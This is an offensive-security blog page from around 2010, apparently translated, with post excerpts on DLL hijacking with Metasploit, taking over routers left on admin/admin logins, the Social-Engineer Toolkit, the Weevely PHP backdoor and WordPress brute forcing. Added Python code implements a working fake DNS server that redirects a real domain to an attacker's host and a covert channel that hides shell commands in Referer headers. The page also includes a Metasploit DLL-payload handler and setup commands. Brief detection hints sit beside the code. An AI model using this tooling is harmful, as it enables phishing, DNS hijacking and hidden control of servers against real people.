ClsHack: Computer Security Blog

Tools for searching for DLL Hijacking Vulnerabilities

Thursday, September 2nd, 2010

More information about this vulnerability can be found here:

[DLL Hijacking] Windows 7 and more applications Remote Code Execution => Metasploit

Let us now look at the vulnerable applications :D


In the post mentioned above, I showed how you can exploit this vulnerability with Metasploit, using WebDAV, even remotely.

The exploit written by HD Moore, Metasploit developer, is very simple.
The code that interests us is:

# Any request whose path ends in .dll, .dl, .drv or .cpl is answered with
# a freshly generated payload DLL instead of a real file.
if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
    print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
    return if ((p = regenerate_payload(cli)) == nil)
    data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
    return
end
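The Metasploit side only decides which requests get a DLL; finding out which applications ask for a library from a directory an attacker controls is what the audit tools in this post do, typically by recording file activity with Process Monitor and keeping the "NAME NOT FOUND" hits for library extensions. As an added example (not the post's code and not HD Moore's kit) here is a Python triage script for such a CSV export. The column names are Process Monitor's default export layout, the viewer.exe entries are constructed for the example and imply nothing about any real product, and the list of trusted directories is an assumption you should adapt:

```python
import csv
import io
import ntpath
import re
import sys

# The same extension set the Metasploit module above serves a payload for.
HIJACK_EXT = re.compile(r"\.(dll|dl|drv|cpl)$", re.IGNORECASE)

# Directories a standard user cannot write to, so a failed lookup there is not
# something an attacker can satisfy (assumption: default Windows layout).
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed Process Monitor CSV export (its default columns) for a hypothetical
# viewer.exe opening a document from a WebDAV/UNC share; no real product is implied.
SAMPLE_PROCMON = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"7:10:01.0000000 PM","viewer.exe","1234","CreateFile","C:\Windows\System32\msvcrt.dll","SUCCESS","Desired Access: Read"
"7:10:01.0100000 PM","viewer.exe","1234","CreateFile","\\10.0.0.5\share\docs\plugin.dll","NAME NOT FOUND","Desired Access: Read"
"7:10:01.0200000 PM","viewer.exe","1234","CreateFile","C:\Windows\System32\plugin.dll","SUCCESS","Desired Access: Read"
"7:10:01.0300000 PM","viewer.exe","1234","CreateFile","\\10.0.0.5\share\docs\plugin.dll","NAME NOT FOUND","Desired Access: Read"
"7:10:01.0400000 PM","viewer.exe","1234","ReadFile","\\10.0.0.5\share\docs\letter.rtf","SUCCESS","Offset: 0"
"7:10:01.0500000 PM","viewer.exe","1234","CreateFile","C:\Users\bob\Downloads\helper.cpl","NAME NOT FOUND","Desired Access: Read"
"7:10:02.0000000 PM","svchost.exe","800","CreateFile","C:\Windows\System32\missing.dll","NAME NOT FOUND","Desired Access: Read"
'''


def is_trusted_dir(path):
    """True when the path sits under a directory normal users cannot write to."""
    p = path.lower()
    return any(p.startswith(d) for d in TRUSTED_DIRS)


def find_hijack_candidates(procmon_csv):
    """Return [(process, library, directory)] for library loads that missed in a
    directory an attacker could plant a file in; repeated probes are collapsed."""
    findings, seen = [], set()
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        if row.get("Operation") != "CreateFile" or row.get("Result") != "NAME NOT FOUND":
            continue
        path = row.get("Path", "")
        if not HIJACK_EXT.search(path) or is_trusted_dir(path):
            continue
        directory, name = ntpath.split(path)
        key = (row["Process Name"].lower(), name.lower(), directory.lower())
        if key not in seen:
            seen.add(key)
            findings.append((row["Process Name"], name, directory))
    return findings


if __name__ == "__main__":
    # Process Monitor writes its CSV with a BOM, hence utf-8-sig.
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_PROCMON
    for process, name, directory in find_hijack_candidates(text):
        print("%s looks for %s in %s" % (process, name, directory))
```

On the sample the script reports viewer.exe probing for plugin.dll on the UNC share (the remote WebDAV case) and for helper.cpl in a user's Downloads directory, while the svchost.exe miss inside System32 is ignored because nobody can drop a file there. A hit only says the search order passes through a writable directory; confirm it by placing a harmless DLL there and watching it load.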


(more…)

[Remote-Router] Fake DNS and Phishing/Exploiting attack

Sunday, August 29th, 2010

Very few people change the password on their router -.-' ; for convenience they leave the default, which is easy to remember o.O

User: admin
Password: admin

So, if the router is reachable from outside, or if a user manages to join our network, they can leverage DNS to carry out targeted attacks against your PC :D
The attacks range from phishing:
Wiki:

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging.

up to taking remote control of the victim's PC :D

All this using DNS.
Once we can get into the router, in addition to changing the Wi-Fi SSID to “What an asshole that sie” / “Are you a shit” and various other crap, we can change the DNS servers.
For example, to Google's o.O

DNS servers, put crudely, do nothing but return the IP of the website we are connecting to; for example, if we type www.clshack.com:
; <<>> DiG 9.7.0-P1 <<>> www.clshack.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.com.		IN	A
;; ANSWER SECTION:
www.clshack.com.	31	IN	A	94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE  rcvd: 48

It returns:
94.141.22.26
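To make concrete what a "fake DNS" pointed to from a hijacked router does, here is an added example (not code from the original post): a minimal Python resolver that answers A queries for chosen names with an address of the attacker's choosing and relays every other query to the real resolver, so the victim sees nothing odd. The spoofed name table, the 192.0.2.10 address (a documentation address standing in for the attacker's host) and the listening settings are assumptions; the upstream 8.8.8.8 and the 31-second TTL are taken from the dig output above.

```python
import socket
import struct

# Names to lie about -> address to hand out (assumed values for the example).
SPOOFED = {
    "www.clshack.com": "192.0.2.10",
}
UPSTREAM = "8.8.8.8"   # the real resolver, as in the dig output


def encode_name(name):
    """'www.clshack.com' -> b'\\x03www\\x07clshack\\x03com\\x00' (RFC 1035 wire format)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, offset):
    """Read a (possibly compressed) name at offset; return (name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if (length & 0xC0) == 0xC0:  # compression pointer to an earlier name
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            tail, _ = decode_name(data, pointer)
            labels.append(tail)
            return ".".join(labels), offset + 2
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(name, qid=0x1234):
    """Build a standard recursive A query, as a stub resolver or dig would send it."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def fake_answer(query, table=SPOOFED, ttl=31):
    """Return a forged response if this is an A lookup for a spoofed name, else None."""
    qid = struct.unpack("!H", query[:2])[0]
    qname, off = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    ip = table.get(qname.lower())
    if qtype != 1 or qclass != 1 or ip is None:
        return None
    # Flags 0x8180: response, recursion desired + available, NOERROR. Same id as the query.
    header = struct.pack("!HHHHHH", qid, 0x8180, 1, 1, 0, 0)
    question = query[12:off + 4]
    # Answer RR: name is a pointer to the question name at offset 12, type A, class IN.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


def answered_ip(response):
    """Pull the first A record out of a response (what the client will connect to)."""
    if struct.unpack("!H", response[6:8])[0] == 0:
        return None
    _, off = decode_name(response, 12)
    off += 4                                  # skip qtype/qclass
    _, off = decode_name(response, off)       # answer name (pointer)
    _, _, _, rdlen = struct.unpack("!HHIH", response[off:off + 10])
    return socket.inet_ntoa(response[off + 10:off + 10 + rdlen])


def serve(listen="0.0.0.0", port=53, upstream=UPSTREAM):
    """Answer spoofed names ourselves, relay everything else to the upstream resolver."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((listen, port))
    while True:
        query, peer = sock.recvfrom(512)
        reply = fake_answer(query)
        if reply is None:
            relay = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            relay.settimeout(3)
            try:
                relay.sendto(query, (upstream, 53))
                reply, _ = relay.recvfrom(4096)
            except socket.timeout:
                continue
            finally:
                relay.close()
        sock.sendto(reply, peer)


if __name__ == "__main__":
    serve()
```

Run as root on the box whose address you put into the router's DNS field; a victim typing www.clshack.com then lands on 192.0.2.10 while every other name still resolves normally. The same property is the detection hint: compare the answer your resolver gives with one from a resolver you trust, or check whether the DNS entry on the router still matches what you set.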
(more…)

[How To] Social Engineering Toolkit with Metasploit

Sunday, June 27th, 2010

The Social-Engineer Toolkit (SET) was written by David Kennedy and makes some remarkable social-engineering-type attacks available to the attacker through a convenient interface :D

The main objective of SET is the automation of such attacks, almost always exploiting human stupidity.

Let's see how to use it.

sudo apt-get install python-pexpect

We need to make a symbolic link, otherwise SET will not find Metasploit if we are not on BackTrack 4:

sudo -s
mkdir -p /pentest/exploits/framework3/
ln -s WHERE_IS_METASPLOIT/* /pentest/exploits/framework3/

(leave the * unquoted: inside quotes the shell does not expand it and you get a single dead link literally named *). For example:

ln -s /home/clshack/msf3/* /pentest/exploits/framework3/


We go into the terminal, and we download the latest version:

svn co http://svn.secmaniac.com/social_engineering_toolkit SET/
cd SET
sudo ./set
Once it opens, we get a somewhat lame-looking menu -.-'


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Let's look at the options in detail.

1. Spear-Phishing Attack Vectors
Typing 1, we get essentially 3 options:

  • Perform a Mass Email Attack
  • Create a FileFormat Payload
  • Create a Social-Engineering Template

(more…)

PHP backdoor with Weevely

Friday, June 25th, 2010

Weevely is a tool designed to create and manage a hidden backdoor on a remote PHP web server.

Weevely encrypts communications between client and server inside plausible-looking HTTP_REFERER fields, to hide itself from NIDS inspection and from the web server's logs.
Weevely allows you to:

  • Dynamically generate the encrypted PHP backdoor
  • Execute commands on the remote shell, obfuscating the requests inside plausible HTTP_REFERER values
  • Simulate a terminal to send commands to the remote shell as above
  • Bypass some PHP configurations that restrict command execution on the system
  • Run modules on the remote machine to automate tasks
  • Add new modules quickly and easily

Written in Python and open source.
For installation on Debian / Ubuntu:
sudo apt-get install python-numpy
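To show what "obfuscating the requests inside a plausible HTTP_REFERER" means in practice, here is an added example in Python. It is an illustration of the idea, not Weevely's actual wire format or code: the client hides a command in the q= parameter of a Referer that looks like a search-engine click, and the backdoor side recovers it, ignoring any Referer that does not authenticate. The shared secret, the host names and the access-log lines are constructed for the example. The last function is the defender's view of the same channel: a simple check over access-log lines that flags the kind of Referer this leaves behind.

```python
import base64
import binascii
import hashlib
import hmac
import os
import re
import urllib.parse

# Shared secret between the client and the planted PHP file (constructed example value).
SECRET = b"example-shared-secret"


def _keystream(key, length):
    """Counter-mode SHA-256 keystream: enough for a toy channel, not a vetted cipher."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def encode_referer(cmd, secret=SECRET):
    """Client side: hide a shell command in a Referer that looks like a search-result click."""
    nonce = os.urandom(4)                       # fresh per request, so the keystream never repeats
    data = cmd.encode()
    ct = bytes(a ^ b for a, b in zip(data, _keystream(secret + nonce, len(data))))
    tag = hmac.new(secret, nonce + ct, hashlib.sha256).digest()[:8]
    blob = base64.urlsafe_b64encode(nonce + tag + ct).rstrip(b"=").decode()
    return "http://www.google.com/search?q=%s&hl=en" % blob


def decode_referer(referer, secret=SECRET):
    """Server side: recover the command, or None when the Referer is an ordinary one."""
    params = urllib.parse.parse_qs(urllib.parse.urlparse(referer).query)
    q = params.get("q", [""])[0]
    if not re.fullmatch(r"[A-Za-z0-9_-]{16,}", q):
        return None
    try:
        raw = base64.urlsafe_b64decode(q + "=" * (-len(q) % 4))
    except binascii.Error:
        return None
    nonce, tag, ct = raw[:4], raw[4:12], raw[12:]
    expected = hmac.new(secret, nonce + ct, hashlib.sha256).digest()[:8]
    if not hmac.compare_digest(tag, expected):
        return None   # not ours, or tampered with: the backdoor behaves like a normal page
    return bytes(a ^ b for a, b in zip(ct, _keystream(secret + nonce, len(ct)))).decode()


# --- the defender's side: what this channel leaves in the access log --------------

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d+ \S+ "([^"]*)" "[^"]*"$')

# Constructed Apache combined-format lines: a genuine search referer, a channel
# referer carrying a literal example blob, and a request with no referer at all.
SAMPLE_LOG = [
    '10.0.0.7 - - [25/Jun/2010:10:00:01 +0200] "GET /index.php HTTP/1.1" 200 5120 "http://www.google.com/search?q=weevely+php+backdoor" "Mozilla/5.0"',
    '10.0.0.9 - - [25/Jun/2010:10:00:05 +0200] "GET /images/logo.php HTTP/1.1" 200 87 "http://www.google.com/search?q=Qk9nTEtaN0hVbmFtZSAtYTtpZA&hl=en" "Mozilla/5.0"',
    '10.0.0.7 - - [25/Jun/2010:10:00:09 +0200] "GET /about.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]


def suspicious_referers(log_lines, min_len=20):
    """Flag Referer query parameters that are one long mixed-case alphanumeric token.

    Real search queries are words joined by '+' or %20; an encoded blob is not.
    Returns [(client_ip, parameter, value)].
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, referer = m.groups()
        params = urllib.parse.parse_qs(urllib.parse.urlparse(referer).query)
        for key, values in params.items():
            for v in values:
                if (len(v) >= min_len and re.fullmatch(r"[A-Za-z0-9_-]+", v)
                        and re.search(r"[a-z]", v) and re.search(r"[A-Z]", v)
                        and re.search(r"\d", v)):
                    hits.append((ip, key, v))
    return hits
```

The heuristic is deliberately crude: legitimate redirect URLs (tracking tokens, url= parameters on search-engine click-throughs) will trip it too, so treat a hit as a pointer to a PHP file worth reading, not as proof of a backdoor. The stronger signal on the server is a Referer on a request for a file that no page of yours links to, as with /images/logo.php above.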
(more…)

[Python]WordPress brute force script :D

Wednesday, June 23rd, 2010

Less security… whose fault is it? Almost always ours… For example, a certain jerk H4, a while ago, got into the blog of our friend sskull.

How did he do it?

With a brute force attack: our friend sskull had left a password that was a bit too weak, and that little shit got in…
(more…)